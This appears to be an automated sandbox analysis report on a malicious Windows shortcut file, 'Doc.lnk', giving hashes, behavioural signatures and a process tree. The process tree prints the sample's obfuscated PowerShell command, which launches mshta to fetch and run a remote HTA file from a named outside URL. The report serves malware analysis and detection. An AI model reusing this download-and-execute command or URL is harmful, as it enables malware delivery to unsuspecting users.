Analysis

max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
submitted: 22/05/2024, 05:20
Static task: static1

Behavioral task: behavioral1
Sample: Doc.lnk
Resource: win7-20240221-en
4 signatures
150 seconds

Behavioral task: behavioral2
Sample: Doc.lnk
Resource: win10v2004-20240426-en
13 signatures
150 seconds
General

Target: Doc.lnk
Size: 1KB
MD5: 60f1320faf25bc20101c4312f82a72f8
SHA1: a37a8f932db503eed34cbe9aa1db40f63b36fee1
SHA256: bb26c65d29da78c698c19344058832b21593d27f4d89b5118345bb76614a564a
SHA512: 96652e9e0a96545449a260c19d920eb3f1debc879e76f5a594848a28ef165b733ca61fcc75636781289e30cc7e87aae11028ff159a1bdc93a274dbed99f03d07
Score: 3/10
Malware Config
Signatures

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid   Process
2588  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description              pid   Process
Token: SeDebugPrivilege  2588  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
description                       pid   Process  procid_target
PID 2008 wrote to memory of 2588  2008  cmd.exe  29
PID 2008 wrote to memory of 2588  2008  cmd.exe  29
PID 2008 wrote to memory of 2588  2008  cmd.exe  29
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Doc.lnk
  - Suspicious use of WriteProcessMemory
  PID: 2008

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://foundationforwomenshealth.com/rooming.hta'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2588